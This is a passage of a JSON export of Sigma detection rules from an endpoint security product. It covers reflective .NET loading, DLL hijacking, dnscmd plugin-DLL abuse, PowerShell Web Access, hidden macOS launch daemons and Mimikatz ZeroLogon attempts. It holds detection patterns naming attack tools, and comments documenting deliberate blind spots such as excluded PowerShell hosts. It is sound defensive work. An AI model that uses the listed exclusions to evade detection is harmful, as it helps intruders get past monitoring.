"rule_modified_date": "2025-01-29",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.exfiltration"
],
"rule_technique_tags": [
"attack.t1048"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a14795b4-3ec8-433a-b68e-66813c847661",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.079412Z",
"creation_date": "2026-03-23T11:45:34.079414Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.079418Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1620/"
],
"name": "t1620_reflective_dotnet_assembly_load.yml",
"content": "title: Reflective Dotnet Assembly Loaded by a Windows Process\nid: a14795b4-3ec8-433a-b68e-66813c847661\ndescription: |\n Detects Microsoft-signed processes running from the Windows directory that load a .NET assembly with no on-disk IL path, i.e. an assembly loaded reflectively from memory.\n Attackers commonly use reflective assembly loading to execute malicious .NET code within legitimate processes. This technique enables in-memory execution without writing assemblies to disk, allowing them to bypass application whitelisting, evade file-based detection, and masquerade malicious activities.\n It is recommended to investigate the loading process for unusual behavior, analyze the loaded assembly's functionality and to review process memory for malicious code.\n Note that powershell.exe, powershell_ise.exe and wsmprovhost.exe are excluded from this rule, so reflective assembly loads performed from PowerShell must be covered by other detections.\nreferences:\n - https://attack.mitre.org/techniques/T1620/\ndate: 2024/11/26\nmodified: 2025/09/04\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.privilege_escalation\n - attack.t1620\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.MemoryExecution\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.Masquerading\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n AssemblyFlags: '0x0'\n AssemblyToken: 'null'\n # Only consider processes located under the Windows directory (the '?' wildcard accepts any drive letter, not just C:)\n Image|startswith: '?:\\windows\\'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Microsoft Corporation'\n - 'Microsoft Windows'\n - 'Microsoft Windows Publisher'\n - 'Windows Phone'\n\n # Assemblies with an on-disk IL path are not reflective loads\n filter_path:\n ModuleILPath|contains: '\\'\n\n # Those two processes are managed using correlation rules (load + exec)\n filter_specific_rules:\n ProcessName:\n - 'w3wp.exe'\n - 'sqlservr.exe'\n\n # NOTE: the PowerShell hosts below are a deliberate blind spot of this rule; cover them elsewhere.\n exclusion_system_bin:\n Image:\n - '?:\\Windows\\SysWOW64\\msiexec.exe'\n - '?:\\Windows\\system32\\msiexec.exe'\n - '?:\\Windows\\System32\\sdiagnhost.exe'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n - '?:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe'\n - '?:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell_ise.exe'\n - '?:\\Windows\\System32\\wsmprovhost.exe'\n - '?:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\ServicePortalAgent\\current\\emulator\\MmrAgent.NetFxEmulator.exe'\n - '?:\\Windows\\System32\\ClusterUpdateUI.exe'\n - '?:\\Windows\\System32\\mmc.exe'\n - '?:\\Windows\\SysWOW64\\TCPSVCS.EXE'\n - '?:\\Windows\\Microsoft.NET\\Framework\\\\*'\n\n exclusion_wmi:\n Image:\n - '?:\\Windows\\System32\\wbem\\WmiPrvSE.exe'\n - '?:\\Windows\\SysWOW64\\wbem\\WmiPrvSE.exe'\n FullyQualifiedAssemblyName: '????????, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null'\n\n exclusion_cylance:\n AssemblyName: 'Cylance.DotNetHookHelper'\n\n exclusion_explorer:\n - ProcessImage: '?:\\WINDOWS\\Explorer.EXE'\n ProcessParentImage: '?:\\WINDOWS\\system32\\userinit.exe'\n - ProcessCommandLine: '?:\\WINDOWS\\explorer.exe /factory,{????????-????-????-????-????????????} -Embedding'\n ProcessParentImage: '?:\\Windows\\System32\\svchost.exe'\n\n # NOTE(review): the two keys below are ANDed (parent in the list AND grandparent = glpi-agent.exe). If the SenseIR.exe exclusion is meant to stand alone, split it into a separate list item.\n exclusion_bluetooth:\n ProcessParentImage:\n - '?:\\Program Files (x86)\\ifm electronic\\Maintenance\\Maintenance.exe'\n - '?:\\Program Files\\Windows Defender Advanced Threat Protection\\SenseIR.exe'\n ProcessGrandparentImage: '?:\\Program Files\\GLPI-Agent\\perl\\bin\\glpi-agent.exe'\n\n exclusion_defender:\n ProcessCommandLine|contains: 'class Elam{ [DllImport(\"Kernel32\", CharSet=CharSet.Auto, SetLastError=true)] public static extern bool InstallELAMCertificateInfo(SafeFileHandle handle);'\n\n exclusion_crowdstrike:\n ProcessCommandLine: '?:\\WINDOWS\\system32\\DllHost.exe /Processid:{BD07DDB9-1C61-4DCE-9202-A2BA1757CDB2}'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a14795b4-3ec8-433a-b68e-66813c847661",
"rule_name": "Reflective Dotnet Assembly Loaded by a Windows Process",
"rule_description": "Detects Microsoft-signed processes running from the Windows directory that load a .NET assembly with no on-disk IL path, i.e. an assembly loaded reflectively from memory.\nAttackers commonly use reflective assembly loading to execute malicious .NET code within legitimate processes. This technique enables in-memory execution without writing assemblies to disk, allowing them to bypass application whitelisting, evade file-based detection, and masquerade malicious activities.\nIt is recommended to investigate the loading process for unusual behavior, analyze the loaded assembly's functionality and to review process memory for malicious code.\nNote that powershell.exe, powershell_ise.exe and wsmprovhost.exe are excluded from this rule, so reflective assembly loads performed from PowerShell must be covered by other detections.\n",
"rule_creation_date": "2024-11-26",
"rule_modified_date": "2025-09-04",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1620"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a16193ec-65ac-4236-8677-ea8c508bb28b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.596542Z",
"creation_date": "2026-03-23T11:45:34.596545Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.596553Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/SBousseaden/status/1550903546916311043",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_teams.yml",
"content": "title: DLL Hijacking via Teams\nid: a16193ec-65ac-4236-8677-ea8c508bb28b\ndescription: |\n Detects potential Windows DLL Hijacking via Teams (Teams.exe loading an iphlpapi.dll that is neither located under the Windows directory nor signed by Microsoft Windows).\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://twitter.com/SBousseaden/status/1550903546916311043\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/07/25\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'Teams.exe'\n ImageLoaded|endswith: '\\iphlpapi.dll'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a16193ec-65ac-4236-8677-ea8c508bb28b",
"rule_name": "DLL Hijacking via Teams",
"rule_description": "Detects potential Windows DLL Hijacking via Teams (Teams.exe loading an iphlpapi.dll that is neither located under the Windows directory nor signed by Microsoft Windows).\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-07-25",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a176936a-ed50-4a97-b571-745ba57b6df2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.093106Z",
"creation_date": "2026-03-23T11:45:34.093108Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.093112Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_netevtfwdr.yml",
"content": "title: DLL Hijacking via NetEvtFwdr.exe\nid: a176936a-ed50-4a97-b571-745ba57b6df2\ndescription: |\n Detects potential Windows DLL Hijacking via NetEvtFwdr.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'NetEvtFwdr.EXE'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\umpdc.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a176936a-ed50-4a97-b571-745ba57b6df2",
"rule_name": "DLL Hijacking via NetEvtFwdr.exe",
"rule_description": "Detects potential Windows DLL Hijacking via NetEvtFwdr.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a1bcb546-2d2e-4a4a-b5d2-050f7f179bbd",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.090659Z",
"creation_date": "2026-03-23T11:45:34.090661Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.090665Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Binaries/Dnscmd/",
"https://attack.mitre.org/techniques/T1210/"
],
"name": "t1210_possible_lateral_movement_using_dns_serverlevelplugindll.yml",
"content": "title: Possible Lateral Movement via DNS ServerLevelPluginDLL\nid: a1bcb546-2d2e-4a4a-b5d2-050f7f179bbd\ndescription: |\n Detects the usage of Dnscmd to make a DNS server load an arbitrary DLL through the ServerLevelPluginDll setting.\n This tool can be used to configure a remote (or local) DNS server to use a Server Level Plugin DLL.\n Attackers, provided that they already have elevated privileges, can use this technique to make the DNS server load a malicious DLL and therefore achieve local proxy execution, persistence, or lateral movement if the DNS server is remote.\n It is recommended to analyze the DLL specified on the command-line for malicious content and to investigate the parent process for other suspicious activities.\n Note that this rule only covers the dnscmd.exe front-end; setting the ServerLevelPluginDll parameter by other means (e.g. a direct registry edit) is not covered here.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Dnscmd/\n - https://attack.mitre.org/techniques/T1210/\ndate: 2022/12/04\nmodified: 2025/03/12\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1210\n - attack.persistence\n - attack.t1543.003\n - attack.defense_evasion\n - attack.t1218\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Dnscmd\n - classification.Windows.Behavior.Lateralization\n - classification.Windows.Behavior.ProcessInjection\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_image:\n - Image|endswith: '\\dnscmd.exe'\n - OriginalFileName: 'dnscmd.exe'\n\n selection_args:\n # '?' matches either the '/' or '-' switch prefix\n CommandLine|contains|all:\n - ' ?config'\n - ' ?serverlevelplugindll'\n\n condition: all of selection_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a1bcb546-2d2e-4a4a-b5d2-050f7f179bbd",
"rule_name": "Possible Lateral Movement via DNS ServerLevelPluginDLL",
"rule_description": "Detects the usage of Dnscmd to make a DNS server load an arbitrary DLL through the ServerLevelPluginDll setting.\nThis tool can be used to configure a remote (or local) DNS server to use a Server Level Plugin DLL.\nAttackers, provided that they already have elevated privileges, can use this technique to make the DNS server load a malicious DLL and therefore achieve local proxy execution, persistence, or lateral movement if the DNS server is remote.\nIt is recommended to analyze the DLL specified on the command-line for malicious content and to investigate the parent process for other suspicious activities.\nNote that this rule only covers the dnscmd.exe front-end; setting the ServerLevelPluginDll parameter by other means (e.g. a direct registry edit) is not covered here.\n",
"rule_creation_date": "2022-12-04",
"rule_modified_date": "2025-03-12",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.lateral_movement",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1210",
"attack.t1218",
"attack.t1543.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a1d89f7b-31f9-409e-8e50-56b3bad0e73b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.085896Z",
"creation_date": "2026-03-23T11:45:34.085899Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.085903Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://docs.microsoft.com/en-us/powershell/module/powershellwebaccess/install-pswawebapplication",
"https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-241a",
"https://gist.github.com/MHaggis/7e67b659af9148fa593cf2402edebb41",
"https://attack.mitre.org/techniques/T1059/001/",
"https://attack.mitre.org/techniques/T1219/"
],
"name": "t1059_001_powershell_web_access_installation.yml",
"content": "title: Windows PowerShell Web Access Enabled\nid: a1d89f7b-31f9-409e-8e50-56b3bad0e73b\ndescription: |\n Detects the installation of the PowerShell Web Access feature.\n PowerShell Web Access is a Windows Server feature which can be used by adversaries for remote access.\n It is recommended to investigate the process that set the registry key for suspicious activities.\n Note that TiWorker.exe (the Windows servicing-stack worker) is excluded; if a feature installation through the standard servicing path (e.g. Install-WindowsFeature or DISM) is performed by that process, it will not be alerted on by this rule, so validate coverage against a test installation.\nreferences:\n - https://docs.microsoft.com/en-us/powershell/module/powershellwebaccess/install-pswawebapplication\n - https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-241a\n - https://gist.github.com/MHaggis/7e67b659af9148fa593cf2402edebb41\n - https://attack.mitre.org/techniques/T1059/001/\n - https://attack.mitre.org/techniques/T1219/\ndate: 2024/09/06\nmodified: 2025/02/03\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - attack.defense_evasion\n - attack.t1112\n - attack.command_and_control\n - attack.t1219\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.CommandAndControl\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Component Based Servicing\\Packages\\Microsoft-Windows-PowerShellWebAccess-Package*\\Updates\\WindowsPowerShellWebAccess'\n Details: 'DWORD (0x00000001)'\n\n # NOTE(review): this exclusion is amd64-only and may also hide installations performed through the standard servicing path; validate against a test install.\n exclusion_tiworker:\n ProcessImage: '?:\\Windows\\WinSxS\\amd64_microsoft-windows-servicingstack_*\\TiWorker.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a1d89f7b-31f9-409e-8e50-56b3bad0e73b",
"rule_name": "Windows PowerShell Web Access Enabled",
"rule_description": "Detects the installation of the PowerShell Web Access feature.\nPowerShell Web Access is a Windows Server feature which can be used by adversaries for remote access.\nIt is recommended to investigate the process that set the registry key for suspicious activities.\nNote that TiWorker.exe (the Windows servicing-stack worker) is excluded; if a feature installation through the standard servicing path (e.g. Install-WindowsFeature or DISM) is performed by that process, it will not be alerted on by this rule, so validate coverage against a test installation.\n",
"rule_creation_date": "2024-09-06",
"rule_modified_date": "2025-02-03",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001",
"attack.t1112",
"attack.t1219"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a1ed8019-9b29-4699-9c30-056751959bd0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.627371Z",
"creation_date": "2026-03-23T11:45:34.627373Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.627378Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1543/004/",
"https://attack.mitre.org/techniques/T1152/"
],
"name": "t1543_004_new_daemon_hidden_file.yml",
"content": "title: New Hidden Launch Daemon File Added\nid: a1ed8019-9b29-4699-9c30-056751959bd0\ndescription: |\n Detects a new hidden Launch Daemon file being created.\n An attacker may create or modify Launch Daemons to execute malicious payloads as a way to establish persistent access.\n An attacker could hide the file describing the Launch Daemons to hinder investigation and evade defenses.\n Launch Daemons are plist files used to interact with Launchd, the service management framework used by macOS.\n Launch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction.\n It is recommended to investigate the newly created Launch Daemon for malicious content.\nreferences:\n - https://attack.mitre.org/techniques/T1543/004/\n - https://attack.mitre.org/techniques/T1152/\ndate: 2023/07/11\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1543.004\n - attack.t1152\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.Persistence\n - classification.macOS.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image:\n - '/bin/mv'\n - '/bin/cp'\n - '/usr/bin/rsync'\n CommandLine|contains:\n - ' /Library/LaunchDaemons/.'\n # Also catch /Users//Library/LaunchAgents/.\n - ' /Library/LaunchAgents/.'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a1ed8019-9b29-4699-9c30-056751959bd0",
"rule_name": "New Hidden Launch Daemon File Added",
"rule_description": "Detects a new hidden Launch Daemon file being created.\nAn attacker may create or modify Launch Daemons to execute malicious payloads as a way to establish persistent access.\nAn attacker could hide the file describing the Launch Daemons to hinder investigation and evade defenses.\nLaunch Daemons are plist files used to interact with Launchd, the service management framework used by macOS.\nLaunch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction.\nIt is recommended to investigate the newly created Launch Daemon for malicious content.\n",
"rule_creation_date": "2023-07-11",
"rule_modified_date": "2026-02-11",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1152",
"attack.t1543.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a20dba34-aa51-4f61-a9f2-5eaff30f5810",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.596590Z",
"creation_date": "2026-03-23T11:45:34.596593Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.596601Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/gentilkiwi/mimikatz",
"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1472",
"https://attack.mitre.org/techniques/T1078/"
],
"name": "t1078_zerologon_mimikatz.yml",
"content": "title: Mimikatz Netlogon Authentication Failed\nid: a20dba34-aa51-4f61-a9f2-5eaff30f5810\ndescription: |\n Detects when a Netlogon connection attempt fails with 'mimikatz' as the machine name.\n This is a sign of a mimikatz lsadump::zerologon test or of an exploitation attempt of CVE-2020-1472 (aka ZeroLogon).\n It is recommended to check the source of the connection and analyze the source machine for suspicious activities.\nreferences:\n - https://github.com/gentilkiwi/mimikatz\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1472\n - https://attack.mitre.org/techniques/T1078/\ndate: 2020/11/13\nmodified: 2025/03/07\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.credential_access\n - attack.t1078\n - cve.2020-1472\n - classification.Windows.Source.EventLog\n - classification.Windows.Exploit.CVE-2020-1472\n - classification.Windows.Exploit.ZeroLogon\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n service: system\ndetection:\n selection_event:\n EventID: 5805\n\n selection_param:\n # this is normally param1, but we cannot be sure?\n - EventDataParam1: \"mimikatz\"\n - EventDataParam2: \"mimikatz\"\n\n condition: all of selection_*\nlevel: high\n# level: critical\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a20dba34-aa51-4f61-a9f2-5eaff30f5810",
"rule_name": "Mimikatz Netlogon Authentication Failed",
"rule_description": "Detects when a Netlogon connection attempt fails with 'mimikatz' as the machine name.\nThis is a sign of a mimikatz lsadump::zerologon test or of an exploitation attempt of CVE-2020-1472 (aka ZeroLogon).\nIt is recommended to check the source of the connection and analyze the source machine for suspicious activities.\n",
"rule_creation_date": "2020-11-13",
"rule_modified_date": "2025-03-07",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1078"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a2841070-5315-4b34-829e-4f0061d533c0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
